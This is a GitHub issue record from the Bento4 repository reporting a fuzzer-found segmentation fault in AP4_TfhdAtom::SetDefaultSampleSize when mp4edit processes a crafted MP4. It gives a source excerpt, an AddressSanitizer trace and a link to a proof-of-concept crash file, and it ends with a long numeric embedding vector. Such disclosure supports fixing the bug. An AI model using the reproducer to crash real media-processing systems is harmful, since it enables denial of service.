(/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x442b88 in _start (/src/aflbuild/installed/bin/mp4edit+0x442b88) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/bento4/Source/C++/Core/Ap4TfhdAtom.h:80 AP4_TfhdAtom::SetDefaultSampleSize(unsigned int) ==16948==ABORTING ``` ### others from fuzz project pwd-bento4-mp4edit-00 crash name pwd-bento4-mp4edit-00-00000631-20190828.mp4 Auto-generated by pyspider at 2019-08-28 22:40:24 please send email to [email protected] if you have any questions. [poc3.tar.gz](https://github.com/axiomatic-systems/Bento4/files/3640457/poc3.tar.gz)
SEGV_UNKNOW was discovered in AP4_TfhdAtom::SetDefaultSampleSize in Ap4TfhdAtom.h-
https://api.github.com/repos/axiomatic-systems/Bento4/issues/432/comments
0
2019-09-23T02:21:12
2019-10-08T05:15:45Z
https://github.com/axiomatic-systems/Bento4/issues/432
496,867,693
432
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : SEGV_UNKNOW was discovered in AP4_TfhdAtom::SetDefaultSampleSize in Ap4TfhdAtom.h- Issue date: --- start body --- # bento4 ## version bento4 1.5.1.0 ## description ```txt None ``` ## download link None ## others please send email to [email protected] if you have any questions. --------------------- ## AP4_TfhdAtom::[email protected]___SEGV_UNKNOW ### description An issue was discovered in bento4 1.5.1.0, There is a/an SEGV_UNKNOW in function AP4_TfhdAtom::SetDefaultSampleSize at Ap4TfhdAtom.h-80 ### commandline mp4edit @@ a.mp4 ### source ```c 76 void SetSampleDescriptionIndex(AP4_UI32 indx) { m_SampleDescriptionIndex = indx; } 77 AP4_UI32 GetDefaultSampleDuration() { return m_DefaultSampleDuration; } 78 void SetDefaultSampleDuration(AP4_UI32 duration) { m_DefaultSampleDuration = duration; } 79 AP4_UI32 GetDefaultSampleSize() { return m_DefaultSampleSize; } 80 void SetDefaultSampleSize(AP4_UI32 size) { m_DefaultSampleSize = size; } 81 AP4_UI32 GetDefaultSampleFlags() { return m_DefaultSampleFlags; } 82 void SetDefaultSampleFlags(AP4_UI32 flags) { m_DefaultSampleFlags = flags; } 83 84 void UpdateFlags(AP4_UI32 flags); 85 ``` ### bug report ```txt ASAN:SIGSEGV ================================================================= ==16948==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x000000498774 bp 0x7ffdcfa6e2e0 sp 0x7ffdcfa6df60 T0) #0 0x498773 in AP4_TfhdAtom::SetDefaultSampleSize(unsigned int) /src/bento4/Source/C++/Core/Ap4TfhdAtom.h:80 #1 0x498773 in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) /src/bento4/Source/C++/Core/Ap4Processor.cpp:331 #2 0x4a68d0 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /src/bento4/Source/C++/Core/Ap4Processor.cpp:711 #3 0x43f413 in main /src/bento4/Source/C++/Apps/Mp4Edit/Mp4Edit.cpp:451 #4 0x7fc7db40082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x442b88 in _start (/src/aflbuild/installed/bin/mp4edit+0x442b88) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/bento4/Source/C++/Core/Ap4TfhdAtom.h:80 AP4_TfhdAtom::SetDefaultSampleSize(unsigned int) ==16948==ABORTING ``` ### others from fuzz project pwd-bento4-mp4edit-00 crash name pwd-bento4-mp4edit-00-00000631-20190828.mp4 Auto-generated by pyspider at 2019-08-28 22:40:24 please send email to [email protected] if you have any questions. [poc3.tar.gz](https://github.com/axiomatic-systems/Bento4/files/3640457/poc3.tar.gz) --- end body ---
3,102
[ -0.031328607350587845, 0.013300755061209202, -0.0030606412328779697, 0.018305916339159012, 0.030432621017098427, 0.015617959201335907, -0.027343016117811203, 0.0382184274494648, -0.02258502133190632, 0.04563348367810249, -0.007893944159150124, 0.012543801218271255, 0.025782763957977295, 0.021163802593946457, 0.020345056429505348, 0.00025754765374585986, -0.030030973255634308, 0.0012059119762852788, -0.027095846831798553, -0.009539159014821053, 0.05175090581178665, -0.04050473868846893, -0.017409931868314743, 0.045664381235837936, 0.007175610400736332, 0.017935164272785187, -0.017023731023073196, 0.011493335478007793, -0.010095288045704365, 0.00399331608787179, -0.023388318717479706, 0.02939760312438011, 0.004947232082486153, 0.023975344374775887, 0.03636466711759567, 0.020329609513282776, 0.03636466711759567, 0.06157585233449936, 0.029366707429289818, 0.04195685312151909, -0.024732297286391258, -0.043594345450401306, -0.028779681771993637, 0.006418657023459673, -0.014752869494259357, 0.017857924103736877, 0.010852241888642311, -0.00885172188282013, -0.04136982932686806, 0.001197222387418151, 0.019588103517889977, -0.0009833637159317732, -0.047549039125442505, -0.05768295004963875, 0.01043514534831047, -0.03478896617889404, 0.03627197816967964, 0.027713768184185028, -0.004985852167010307, 0.012945449911057949, -0.017193658277392387, 0.0068048578687012196, -0.007048164028674364, 0.012590145692229271, 0.009994876570999622, 0.027512943372130394, 0.014505701139569283, 0.008388280868530273, -0.04294552654027939, 0.027528392150998116, -0.01216532476246357, -0.02400624006986618, 0.023774519562721252, 0.036457352340221405, 0.018475845456123352, -0.007090646307915449, 0.04368703067302704, 0.01308448240160942, -0.045571692287921906, 0.046467676758766174, -0.020731257274746895, 0.02732756733894348, -0.04214223101735115, 0.028517065569758415, 0.046653054654598236, 0.0003671321028377861, -0.026848677545785904, -0.07161707431077957, -0.015417135320603848, -0.03460358828306198, 0.017610754817724228, 0.011725055985152721, 0.04402688890695572, 0.014544321224093437, 0.002309480682015419, 0.040937282145023346, -0.03128226473927498, -0.016622081398963928, -0.07155527919530869, 0.014049984514713287, -0.025458356365561485, -0.02358914352953434, 0.01779613271355629, 0.009137510322034359, 0.006268038880079985, -0.00003478824146441184, 0.00943874754011631, -0.009701363742351532, 0.022554125636816025, 0.12611772119998932, -0.0021685173269361258, -0.00712154246866703, -0.007843737490475178, 0.0009582606726326048, -0.01489962637424469, 0.008434625342488289, -0.00011489473399706185, -0.027868248522281647, -0.03454179689288139, -0.034387316554784775, -0.005530395079404116, -0.03237907215952873, -0.026848677545785904, -0.021241042762994766, -0.03367670625448227, 0.0367354191839695, -0.013277582824230194, 0.00428296672180295, -0.013632887974381447, -0.011902707628905773, -0.021982548758387566, -0.014652458019554615, -0.0035684951581060886, -0.018475845456123352, -0.0004525790282059461, -0.0028443688061088324, -0.017919715493917465, 0.018027853220701218, 0.01779613271355629, 0.003338705748319626, -0.06611757725477219, 0.00359939131885767, 0.014049984514713287, 0.0013584612170234323, -0.0034391179215162992, -0.0009693639585748315, -0.019402727484703064, 0.0063568647019565105, -0.004993576090782881, 0.004580341279506683, -0.03046351671218872, -0.026941366493701935, 0.013880056329071522, 0.006360726896673441, 0.04186416417360306, 0.019603552296757698, 0.004700063727796078, 0.013401167467236519, 0.002568235155194998, -0.005321846809238195, 0.009423298761248589, -0.011153478175401688, 0.02260047011077404, -0.019402727484703064, -0.0034584279637783766, -0.027358463034033775, 0.026632405817508698, 0.005727357696741819, -0.02459326572716236, 0.022909430786967278, 0.03234817832708359, -0.0001344461488770321, 0.010697761550545692, 0.03627197816967964, -0.07167886197566986, -0.023372871801257133, 0.02093208208680153, 0.03908351808786392, 0.0007091611623764038, -0.030154556035995483, -0.013462958857417107, 0.017147313803434372, 0.011207547038793564, 0.013424338772892952, 0.0037982845678925514, -0.014451633207499981, 0.04408868029713631, -0.022863086313009262, 0.046066030859947205, 0.004418137017637491, 0.027034055441617966, 0.007191058713942766, 0.01631312072277069, 0.008720413781702518, 0.03790946677327156, -0.018429500982165337, -0.036704521626234055, -0.03945427015423775, -0.019016526639461517, 0.011060790158808231, -0.006773961707949638, -0.028594305738806725, -0.015664303675293922, 0.007148576434701681, -0.014729698188602924, -0.013262134976685047, -0.016853801906108856, 0.05440796539187431, 0.034140147268772125, -0.004244346637278795, -0.018182333558797836, -0.03818753361701965, -0.00045861341641284525, 0.015579339116811752, -0.02632344514131546, 0.009137510322034359, -0.020746706053614616, 0.03194652870297432, -0.0034082219935953617, -0.0016992834862321615, 0.026771437376737595, -0.02947484329342842, 0.012690558098256588, -0.0120803602039814, -0.0342637337744236, -0.01043514534831047, 0.034480005502700806, 0.013586543500423431, 0.0025856143329292536, 0.010157080367207527, 0.03398566693067551, 0.004198002628982067, -0.04377971962094307, -0.0026145793963223696, 0.02996918000280857, 0.0008341936627402902, 0.010095288045704365, -0.02258502133190632, 0.01180229615420103, -0.0038465596735477448, -0.009600951336324215, 0.03948516771197319, -0.036457352340221405, -0.01572609506547451, 0.01612774468958378, 0.07581893354654312, -0.029165882617235184, -0.011145754717290401, 0.005290950648486614, 0.007461399305611849, 0.0056153591722249985, -0.004294552840292454, 0.007940287701785564, 0.020051544532179832, 0.0022476885933429003, -0.00770084373652935, 0.03815663605928421, 0.007287608925253153, -0.003941178787499666, -0.03054075688123703, 0.02301756665110588, -0.002628096379339695, -0.01159374788403511, -0.023635488003492355, 0.015061830170452595, -0.030355380848050117, -0.00370366545394063, -0.00287526473402977, -0.03146763890981674, -0.041431620717048645, 0.016452154144644737, -0.006696721538901329, -0.012752349488437176, -0.025720972567796707, -0.024778641760349274, 0.004255932755768299, 0.03491254895925522, 0.005379776936024427, 0.019016526639461517, 0.0008554347441531718, -0.026369789615273476, 0.0034371870569884777, -0.0007854358409531415, 0.00525619275867939, 0.03029358945786953, -0.03122047148644924, 0.0181205403059721, -0.040937282145023346, -0.043161798268556595, -0.02581365965306759, 0.006098110228776932, 0.032811619341373444, -0.06741520762443542, -0.008620001375675201, -0.005333432927727699, 0.013679231517016888, -0.017317242920398712, 0.026925917714834213, -0.017904268577694893, -0.003068365156650543, -0.024716850370168686, -0.027512943372130394, 0.007148576434701681, 0.004483791068196297, -0.029830148443579674, 0.029922837391495705, -0.01432032510638237, -0.0077935317531228065, -0.005020610056817532, -0.014513425529003143, 0.04622051119804382, -0.031405847519636154, -0.024639610201120377, 0.010597349144518375, -0.02417616918683052, -0.02409892901778221, -0.009732259437441826, -0.022646814584732056, -0.03531419858336449, 0.005144194234162569, -0.05477871745824814, 0.00806387234479189, -0.03210100904107094, 0.021241042762994766, 0.013524751178920269, -0.0024156859144568443, -0.018568534404039383, 0.022044340148568153, -0.06537606567144394, 0.004298414569348097, 0.0044528949074447155, -0.008372833020985126, -0.014976866543293, -0.005047644022852182, 0.006677411496639252, -0.01756441220641136, -0.01469107810407877, -0.013555647805333138, 0.014644733630120754, 0.008751309476792812, -0.00438724085688591, 0.024608714506030083, -0.0011083962162956595, -0.007472984958440065, -0.01606595329940319, 0.020746706053614616, 0.009075718000531197, -0.014096328057348728, -0.0047773034311831, 0.028532514348626137, 0.0010398456361144781, 0.008504141122102737, -0.008666345849633217, 0.006360726896673441, -0.00633369293063879, -0.027003157883882523, -0.011632367968559265, 0.00002391125963185914, 0.032502658665180206, -0.03651914745569229, 0.019927959889173508, -0.012142152525484562, -0.008048424497246742, 0.017610754817724228, 0.004298414569348097, 0.01705462671816349, 0.0028347137849777937, 0.011686435900628567, -0.004854543600231409, -0.006086524110287428, -0.020159680396318436, 0.05678696185350418, -0.027188535779714584, 0.039855919778347015, -0.002234171610325575, -0.014984590001404285, 0.009739983826875687, 0.014065432362258434, -0.04319269582629204, 0.016374913975596428, -0.027343016117811203, -0.002309480682015419, 0.017595307901501656, -0.024778641760349274, 0.028455274179577827, 0.010257492773234844, -0.03139039874076843, 0.04065921902656555, -0.03840380534529686, -0.011740503832697868, -0.028949610888957977, 0.022476885467767715, -0.043656136840581894, -0.06617936491966248, 0.0012744625564664602, 0.03750782087445259, -0.03818753361701965, -0.01762620359659195, 0.018583981320261955, -0.04461391270160675, 0.040844593197107315, 0.0013024621875956655, 0.025195738300681114, -0.02459326572716236, 0.02698771096765995, 0.047054704278707504, 0.008728137239813805, -0.01113803032785654, 0.027837352827191353, -0.0221833735704422, 0.023357423022389412, 0.00035627023316919804, -0.01561023574322462, 0.002969884080812335, 0.040844593197107315, 0.02003609575331211, -0.006325969006866217, 0.003877455834299326, -0.018846597522497177, 0.02434609644114971, 0.0010263285366818309, 0.01063596922904253, 0.005839355755597353, 0.006766237784177065, 0.03519061580300331, 0.030525309965014458, -0.015741543844342232, 0.0078591862693429, 0.013014966621994972, -0.032409969717264175, -0.0061251441948115826, 0.0036264252848923206, -0.0004187864833511412, 0.010566453449428082, 0.004877715837210417, -0.03420194238424301, 0.02911953814327717, -0.025149395689368248, 0.006874374113976955, -0.01994340866804123, -0.01720910705626011, 0.04031936079263687, -0.03855828568339348, 0.005005162209272385, 0.00420186435803771, -0.030247244983911514, -0.01954175904393196, -0.026941366493701935, 0.003344498807564378, -0.021967099979519844, -0.015772439539432526, 0.038867246359586716, 0.018105093389749527, -0.016529394313693047, -0.0032846375834196806, 0.002765197539702058, 0.009176130406558514, 0.00016461808991152793, 0.03837290778756142, -0.006171488668769598, -0.025643732398748398, 0.006117420271039009, 0.041184451431035995, -0.009230198338627815, 0.028686994686722755, 0.0072837467305362225, -0.00977087952196598, -0.019588103517889977, 0.005823907908052206, -0.00025923727662302554, 0.006688997615128756, 0.01654484122991562, 0.022631365805864334, 0.0032440866343677044, 0.012474285438656807, 0.016652977094054222, -0.031344056129455566, -0.024037135764956474, -0.00535660469904542, -0.059227753430604935, 0.02896505780518055, -0.0022438266314566135, -0.028161760419607162, 0.025890899822115898, -0.007932564243674278, -0.010968102142214775, -0.0014559769770130515, 0.02300211787223816, 0.009176130406558514, 0.009446470998227596, 0.004066694062203169, 0.0018132126424461603, 0.0010948792332783341, -0.024979466572403908, 0.020298713818192482, -0.016699321568012238, 0.010234320536255836, -0.012798693962395191, 0.025118498131632805, 0.04371792823076248, 0.013625163584947586, -0.0034526349045336246, 0.005445430986583233, -0.014304877258837223, 0.014922798611223698, -0.045664381235837936, -0.028378034010529518, 0.021225593984127045, -0.014513425529003143, -0.03293520212173462, 0.01178684737533331, -0.03698258846998215, -0.0008525382145307958, -0.04164789244532585, -0.03156032785773277, -0.02508760243654251, 0.0012126704677939415, -0.027713768184185028, -0.0037809056229889393, 0.004873853642493486, -0.01055872905999422, -0.03608660027384758, -0.0020236920099705458, 0.02117925137281418, 0.018568534404039383, 0.010311560705304146, 0.02110201120376587, -0.010628245770931244, 0.018723014742136, -0.019495414569973946, -0.0054261209443211555, -0.01345523539930582, -0.008759033866226673, 0.0023828588891774416, -0.020005200058221817, 0.009778603911399841, -0.013401167467236519, 0.02037595398724079, 0.0038929039146751165, -0.03435642272233963, -0.0008061941480264068, 0.059227753430604935, -0.018166884779930115, 0.0018991422839462757, -0.06003104895353317, 0.03707527369260788, 0.007600431330502033, 0.029768357053399086, 0.005267778877168894, 0.00336187775246799, 0.04056653007864952, -0.011446991004049778, -0.004240484442561865, -0.006244866643100977, 0.02763652801513672, 0.023851759731769562, -0.02159634791314602, 0.020978426560759544, 0.020422296598553658, 0.031591225415468216, -0.0023770658299326897, 0.008434625342488289, 0.021457314491271973, -0.008511865511536598, 0.00008194697875296697, 0.02689502201974392, 0.0014463219558820128, 0.014273980632424355, -0.01461383793503046, 0.005063092336058617, 0.017100971192121506, -0.017610754817724228, 0.020406849682331085, -0.006546103395521641, -0.008079320192337036, 0.023990793153643608, -0.004116900265216827, -0.01489962637424469, -0.03849649429321289, -0.020097889006137848, 0.04062832146883011, -0.033151473850011826, -0.020839395001530647, 0.023357423022389412, 0.018244124948978424, -0.0003306844155304134, 0.008913514204323292, -0.02184351533651352, 0.010697761550545692, -0.026941366493701935, -0.006302796769887209, 0.0089366864413023, -0.007932564243674278, -0.01374102383852005, 0.0013912883587181568, -0.010373353026807308, 0.012134428136050701, 0.006677411496639252, 0.013254410587251186, -0.0003152363933622837, -0.00885944627225399, 0.01229663286358118, -0.014150396920740604, -0.03710617125034332, -0.030926957726478577, 0.018151436001062393, 0.010018047876656055, 0.02856341004371643, -0.04031936079263687, 0.03608660027384758, 0.023558247834444046, -0.00046561332419514656, 0.042018644511699677, -0.01013390813022852, -0.000029990904295118526, 0.02142641879618168, 0.017687994986772537, 0.0017041109967976809, 0.00018815218936651945, 0.011122582480311394, 0.0019232798367738724, -0.04625140503048897, 0.029567532241344452, 0.0034970480483025312, -0.00430613849312067, 0.01158602349460125, -0.007287608925253153, 0.00507081625983119, 0.012412493117153645, -0.01805874891579151, -0.037785883992910385, 0.03988681733608246, -0.002817334607243538, -0.024392440915107727, -0.021395523101091385, 0.02294032648205757, 0.0458497554063797, -0.0032556725200265646, 0.0010205355938524008, -0.03259534761309624, 0.016822906211018562, -0.014683353714644909, -0.008164284750819206, -0.004425860941410065, -0.028532514348626137, 0.01946451887488365, 0.011848639696836472, -0.01623588055372238, 0.014868729747831821, 0.003740354673936963, -0.032657139003276825, -0.0006044041947461665, -0.0020874151960015297, 0.00661948136985302, -0.002697612391784787, -0.034819863736629486, 0.038527388125658035, 0.057744741439819336, -0.011578299105167389, -0.03234817832708359, -0.012188496999442577, -0.01605050452053547, -0.005553567316383123, 0.018244124948978424, -0.0006179212359711528, -0.01771889254450798, -0.028841475024819374, -0.02459326572716236, 0.029196778312325478, 0.01788881979882717, 0.005711909383535385, -0.03055620566010475, -0.0007289539789780974, 0.0039855921640992165, -0.0035569092724472284, -0.01365605928003788, 0.0008115043747238815, 0.026771437376737595, -0.00811794027686119, -0.01589602418243885, 0.03284251317381859, -0.005758253857493401, -0.017008282244205475, 0.013632887974381447, -0.012613317929208279, 0.013524751178920269, -0.004058970138430595, -0.0026145793963223696, -0.004155520349740982, -0.0529867485165596, 0.026277100667357445, 0.0009051580564118922, 0.03568495064973831, 0.014806938357651234, 0.02185896411538124, -0.03855828568339348, 0.022245164960622787, -0.0016181812388822436, -0.0025778901763260365, -0.004920198116451502, -0.011323407292366028, -0.002025623107329011, 0.0022264474537223577, -0.01510817464441061, 0.030417174100875854, 0.028269896283745766, -0.00535660469904542, -0.010489213280379772, 0.03420194238424301, -0.01813598908483982, -0.0181205403059721, 0.005746667739003897, -0.03259534761309624, 0.01179457176476717, -0.012335252948105335, 0.00459578912705183, -0.0009418471599929035, -0.00395276490598917, -0.015262654982507229, 0.00031644327100366354, -0.02202889323234558, -0.005480188876390457, -0.01581878401339054, -0.03386208415031433, 0.0070520262233912945, 0.0006406105239875615, 0.0017803856171667576, 0.0074420892633497715, 0.02343466319143772, 0.009840396232903004, -0.009106614626944065, -0.0030471242498606443, 0.0019773480016738176, 0.020144233480095863, -0.02740480750799179, -0.00027758179930970073, -0.02508760243654251, -0.038033053278923035, -0.007917116396129131, 0.026925917714834213, 0.015038657933473587, 0.004418137017637491, 0.01489962637424469, -0.016390360891819, -0.01836770959198475, -0.008751309476792812, -0.009006202220916748, -0.0001981692767003551, -0.00828014500439167, 0.006117420271039009, 0.015517547726631165, 0.002141483360901475, 0.03259534761309624, -0.04495377093553543, -0.002581752138212323, -0.014189017005264759, 0.03701348230242729, 0.007005682215094566, 0.008372833020985126, -0.003844628809019923, 0.0020526570733636618, 0.016390360891819, -0.0008839170332066715, 0.029366707429289818, 0.026848677545785904, -0.006739203818142414, 0.0020101750269532204, -0.027111295610666275, 0.021040217950940132, 0.008589105680584908, 0.030757030472159386, -0.010033496655523777, -0.015293550677597523, -0.011516507714986801, 0.0367354191839695, -0.0013314271345734596, -0.02102477103471756, 0.005943629890680313, 0.02423796057701111, 0.022461436688899994, -0.03997950628399849, 0.02301756665110588, -0.03726065158843994, 0.01171733159571886, 0.0019512794679030776, -0.021658139303326607, -0.014467081055045128, -0.011616919189691544, 0.015780163928866386, 0.0004204761062283069, -0.021256491541862488, -0.008666345849633217, 0.04081369936466217, 0.00015532512043137103, -0.01382598839700222, -0.01623588055372238, -0.0017427309649065137, 0.001266738516278565, -0.03321326896548271, -0.011238442733883858, 0.011524231173098087, 0.020793050527572632, -0.036302872002124786, 0.01679201051592827, -0.0017485240241512656, -0.005449293181300163, 0.0008090906194411218, 0.016405809670686722, -0.033305954188108444, 0.008141112513840199, -0.01158602349460125, -0.005136470310389996, 0.034387316554784775, 0.009307438507676125, 0.022399645298719406, -0.010805897414684296, 0.008604553528130054, 0.0009833637159317732, 0.005182814318686724, 0.01005666796118021, -0.026184413582086563, 0.012706005945801735, -0.014049984514713287, -0.03781678155064583, 0.019402727484703064, -0.02292487770318985, 0.013764196075499058, 0.02484043501317501, 0.003836904652416706, 0.023403767496347427, -0.020808497443795204, -0.004715511575341225, -0.004109176341444254, 0.031915631145238876, -0.0025663042906671762, 0.03146763890981674, 0.010357905179262161, -0.011385198682546616, -0.016174089163541794, 0.03528330475091934, -0.03979412838816643, -0.002817334607243538, -0.02905774675309658, -0.017317242920398712, -0.013980467803776264, -0.031498536467552185, -0.019140111282467842, 0.004970403853803873, 0.007233540527522564, 0.012613317929208279, 0.03441821411252022, -0.0006975751603022218, -0.010767277330160141, 0.013215790502727032, 0.00848869327455759, -0.006086524110287428, -0.007948012091219425, -0.02508760243654251, 0.007434364873915911, -0.02343466319143772, 0.029428498819470406, -0.006870511919260025, -0.0020236920099705458, -0.008674069307744503, 0.013177170418202877, -0.003477738006040454, -0.0005875079659745097, -0.032780721783638, -0.01813598908483982, -0.0019406588980928063, 0.01337027084082365, -0.021550003439188004, 0.027111295610666275, 0.008573656901717186, -0.028686994686722755, -0.013779643923044205, -0.01779613271355629, 0.00359939131885767, -0.0015370791079476476, 0.021333731710910797, 0.0039855921640992165, 0.015787888318300247, -0.0125051811337471, 0.0021743103861808777, 0.0207003615796566, -0.04223491623997688, 0.023542799055576324, -0.02053043432533741, -0.03735334053635597, -0.012420217506587505, 0.009794051758944988, -0.00919157825410366, -0.04056653007864952, -0.016158640384674072, 0.050113413482904434, 0.021410971879959106, -0.0016539047937840223, -0.03352222591638565, -0.03401656448841095, -0.02258502133190632, -0.005634669214487076, 0.0008317799074575305, 0.01042742095887661, -0.011362027376890182, -0.0173790343105793, -0.012427940964698792, 0.033892981708049774, 0.0267405416816473, -0.01573381945490837, 0.03247176110744476, 0.03013910911977291, 0.0026995434891432524, -0.015162242576479912, -0.037044379860162735, -0.037446029484272, -0.012597869150340557, -0.01918645389378071, 0.007418917026370764, -0.006291210651397705, 0.06438739597797394, -0.028347136452794075, 0.016498496755957603, 0.006256452761590481, 0.02796093560755253, 0.008264697156846523, -0.04955728352069855, -0.02467050589621067, 0.02582910843193531, -0.004723235499113798, 0.027512943372130394, -0.005738943815231323, -0.0015979057643562555, -0.004132348578423262, 0.01122299488633871, 0.0008863307884894311, -0.012049464508891106, -0.010149356909096241, -0.010203424841165543, -0.021580899134278297, -0.02962932363152504, 0.010048944503068924, -0.0008052285993471742, -0.0036940104328095913, 0.013169446960091591, 0.0011373612796887755, -0.007971184328198433, 0.01663753017783165, -0.006924579851329327, -0.011601471342146397, -0.010489213280379772, -0.0069940960966050625, -0.020051544532179832, -0.015115898102521896, -0.016112295910716057, -0.020638570189476013, 0.02664785459637642, -0.013517027720808983, 0.0017263174522668123, -0.01394184771925211, 0.0037770436611026525, 0.02026781626045704, 0.027219431474804878, -0.011284787207841873, -0.025226635858416557, 0.02334197610616684, 0.01745627447962761, -0.034634485840797424, 0.014482528902590275, -0.012775521725416183, -0.014273980632424355, -0.006580861285328865, -0.013887779787182808, -0.00043037248542532325, 0.036302872002124786, -0.005055368412286043, 0.016189536079764366, 0.0005947491736151278, -0.006592447403818369, 0.0013874262804165483, -0.015208587050437927, -0.00876675732433796, -0.01221166830509901, 0.06312065571546555, -0.020746706053614616, 0.01994340866804123, -0.000563370413146913, 0.01821322925388813, 0.02227606065571308, -0.016606634482741356, -0.013014966621994972, 0.003126295283436775, -0.0034661521203815937, 0.03111233562231064, -0.0453554205596447, 0.03698258846998215, 0.006839615758508444, -0.007924839854240417, -0.015224034897983074, 0.001947417389601469, -0.0458497554063797, -0.010751829482614994, -0.00046585468226112425, 0.0026010621804744005, -0.02732756733894348, 0.04106086865067482, 0.010944929905235767, 0.00868951715528965, 0.009299715049564838, -0.025767315179109573, -0.00467689149081707, -0.006090386305004358, 0.005704185459762812, 0.005155780352652073, -0.006851201876997948, 0.0042791045270860195, 0.01954175904393196, -0.0025720971170812845, 0.026848677545785904, 0.04504645988345146, 0.05993836000561714, -0.021503658965229988, -0.002182034309953451, -0.002338445745408535, -0.03503613546490669, 0.004607375245541334, 0.031668465584516525, -0.013802816160023212, -0.004472204949706793, 0.019402727484703064, 0.019310038536787033, 0.01382598839700222, 0.02525753155350685, 0.00985584408044815, 0.020978426560759544, -0.01813598908483982, -0.021565452218055725, 0.03271893039345741, -0.03318237140774727, -0.016838353127241135, 0.025597387924790382, 0.032224591821432114, 0.011678711511194706, -0.05060775205492973, 0.024299753829836845, -0.022152476012706757, 0.023295631632208824, 0.01572609506547451, 0.013710128143429756, -0.006511345040053129, -0.011686435900628567, 0.021719932556152344, -0.003935385961085558, 0.042018644511699677, -0.013771919533610344, 0.005260054487735033, -0.0089366864413023, -0.008990754373371601, -0.006395484786480665, 0.026632405817508698, -0.009716811589896679, -0.02011333592236042, -0.015517547726631165, 0.013586543500423431, -0.03865097463130951, -0.01365605928003788, -0.010821346193552017, 0.007492295000702143, 0.026632405817508698, 0.00780125567689538, -0.00467689149081707, -0.00030123660690151155, -0.005063092336058617, -0.010458317585289478, -0.004757993388921022, 0.0214418675750494, -0.02028326503932476, 0.008627725765109062, 0.007191058713942766, -0.012258012779057026, -0.02161179482936859, -0.0008119871490634978, -0.007731739431619644, -0.008704965934157372, 0.02499491535127163, -0.029505738988518715, -0.006186936516314745, -0.00010753278183983639, -0.03503613546490669, 0.02003609575331211, 0.0002840989618562162, -0.015200862661004066, -0.020793050527572632, 0.021550003439188004, -0.011925879865884781, -0.02806907333433628, 0.010296112857758999, 0.008311040699481964, 0.10572632402181625, -0.00392959313467145, -0.00011845502012874931, -0.01944907195866108, -0.017348138615489006, -0.0003335809160489589, -0.005850941874086857, 0.023295631632208824, 0.00869724154472351, 0.01357881911098957, 0.02978380396962166, 0.015911472961306572, -0.002743956632912159, 0.01722455397248268, 0.009817223995923996, 0.013880056329071522, 0.0002906160952989012, 0.01159374788403511, 0.0056732892990112305, -0.016513945534825325, 0.0207003615796566, 0.0015206655953079462, 0.010821346193552017, -0.02178172394633293, 0.012852761894464493, -0.009508263319730759, -0.006816443987190723, -0.007978907786309719, -0.02896505780518055, -0.009199302643537521, -0.005619221366941929, 0.016606634482741356, -0.002465891884639859, -0.009168406948447227, 0.0042752427980303764, -0.005692599341273308, 0.01863032579421997, 0.02110201120376587, -0.007855324074625969, -0.024948570877313614, -0.004819785710424185, -0.03963964805006981, -0.008465521037578583, 0.005970663856714964, -0.0047425455413758755, -0.012427940964698792, 0.023048462346196175, -0.0022264474537223577, -0.01216532476246357, -0.00392959313467145, 0.006322106812149286, -0.021750828251242638, 0.005723495502024889, 0.04714738950133324, -0.0011711538536474109, 0.01986616849899292, 0.011045342311263084, -0.01159374788403511, -0.02749749645590782, -0.012010844424366951, 0.003022021148353815, 0.006785547826439142, 0.009307438507676125, 0.01092948205769062, 0.004599651321768761, -0.01337027084082365, -0.027003157883882523, 0.006870511919260025, -0.011979947797954082, 0.01605050452053547, 0.012018567882478237, -0.0014511494664475322, 0.01216532476246357, 0.005932043772190809, 0.026524269953370094, -0.003537599230185151, -0.005298674572259188, 0.02978380396962166, -0.014413013122975826, -0.0008375729667022824, 0.025056706741452217, 0.024886777624487877, 0.018923837691545486, 0.02565917931497097, -0.005178952589631081, 0.024639610201120377, -0.008867169730365276, 0.0054415687918663025, 0.007584983482956886, 0.008504141122102737, -0.0013188757002353668, 0.0005667496589012444, -0.0019812099635601044, 0.015247207134962082, 0.00799435656517744, 0.027682872489094734, 0.013223514892160892, -0.011678711511194706, -0.01954175904393196, -0.0399177111685276, -0.007712429389357567, 0.004140072502195835, 0.01795061305165291, 0.002510305028408766, -0.006171488668769598, 0.02292487770318985, -0.008426900953054428, 0.023558247834444046, 0.037785883992910385, -0.014057707972824574, -0.048043377697467804, -0.03137494996190071, -0.016344016417860985, -0.033305954188108444, -0.0047425455413758755, 0.002929332898929715, 0.0034642210230231285, 0.006426380947232246, -0.017657099291682243, -0.02142641879618168, -0.015030934475362301, -0.018769357353448868, 0.043656136840581894, 0.006256452761590481, -0.010751829482614994, 0.0019628654699772596, -0.019649894908070564, -0.020329609513282776, 0.04445943236351013, 0.02085484191775322, 0.012543801218271255, -0.003427532035857439, -0.007148576434701681, -0.018583981320261955, 0.027373911812901497, -0.044490329921245575, 0.021086562424898148, 0.016019608825445175, -0.001083293231204152, -0.008256972767412663, -0.011732779443264008, 0.028022728860378265, 0.01978892832994461, 0.005275502800941467, 0.02616896480321884, 0.01588057540357113, 0.020793050527572632, 0.008388280868530273, 0.04767262563109398, 0.02805362455546856, 0.009778603911399841, -0.030015524476766586, 0.005229158792644739, 0.024778641760349274, -0.0028965058736503124, -0.014266257174313068, 0.014173568226397038, -0.03651914745569229, -0.023233838379383087, 0.02491767518222332, 0.030911510810256004, 0.03559226542711258, 0.036210186779499054, 0.007260574493557215, -0.0018527982756495476, 0.033398643136024475, -0.012335252948105335, -0.024392440915107727, -0.001637491281144321, -0.036210186779499054, 0.015193138271570206, 0.017734339460730553, -0.01646760106086731, 0.008341937325894833, 0.03899082913994789, 0.02565917931497097, 0.002104794140905142, -0.021658139303326607, 0.017996955662965775, -0.006105834152549505, 0.0037500096950680017, 0.010991274379193783, 0.014382117427885532, -0.012389320880174637, 0.0036785623524338007, -0.026369789615273476, 0.009670467115938663, 0.01861487701535225, -0.013200342655181885, 0.029490292072296143, 0.010960377752780914, 